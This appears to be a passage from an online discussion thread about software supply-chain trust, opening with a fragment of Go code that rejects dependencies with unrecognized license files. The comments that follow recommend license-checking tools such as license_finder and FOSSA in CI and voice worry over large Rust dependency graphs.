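                    licenses[filepath.Dir(path)] = string(text)
                    return nil
                }
            }
            // Reject anything whose license file we don't recognize.
            return fmt.Errorf("unrecognized license: %s", path)
        })
        if err != nil {
            fmt.Fprintln(os.Stderr, err)
            os.Exit(1)
        }
        fmt.Printf("found %d recognized licenses\n", len(licenses))
    }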


I completely agree that you should run 1+ license checkers in your CI process, just like you should check anything else in your CI process that you care about.

In the CII Best Practices badge project we use both the "license_finder" program (which is an OSS tool) and the FOSSA service ( https://fossa.com/ ). Both examine the dependencies for licensing issues. While something could still slip through, it's much less likely, and more importantly we have a really good case for showing due diligence. I'm not a lawyer, but I do know that courts look very favorably on people who are demonstrably making an effort to meet their legal obligations. You're way less likely to have legal problems that way.


"I just finished writing a vastly simpler, attestation-free library which is less than one tenth the size (I will open source it soon - watch this space)."

...

"Even though I love Rust, I am terrified every time I look at the dependency graph of a typical Rust library: I usually see dozens of transitive dependencies written by Internet randos whom I have zero reason to trust."

I have some kind of point to this comment, but I'm trapped in a sudden feeling of professional malaise.

